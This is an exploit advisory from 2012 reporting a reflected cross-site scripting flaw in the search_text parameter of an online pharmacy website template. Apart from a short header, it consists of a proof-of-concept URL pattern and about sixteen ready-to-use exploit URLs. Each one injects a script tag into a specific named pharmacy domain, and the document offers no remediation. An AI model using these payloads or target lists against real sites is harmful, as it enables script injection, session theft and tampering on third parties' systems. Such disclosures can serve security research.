+-------------------------------------------------------------------------+
# Exploit Title : Online Pharmacy - Website XSS (Cross Site Scripting)
# Author         : Atmon3r
# Date            : 26/02/2012
# Editor          : Lupu, Marianna
# Perso           : Do you want drUgs?
# Xss type      : $_GET
+-------------------------------------------------------------------------+

[+] POC:

http://{website}/search.php?search_text=[XSS]

[+] Exploits

http://prohealthpharma.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drug-brand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drug-clomid.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drugsforyou.net/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://drug-clomid.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14 

http://drugbrand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14 

http://gobuypills.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://ed-pharmarx.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://buyingprograf.org/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://drug-accutane.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://bestsellers-rx.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://drug-doxycycline.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://buyingcozaar.org/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://buyinglamictal.org/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drug-brand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drugbrand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11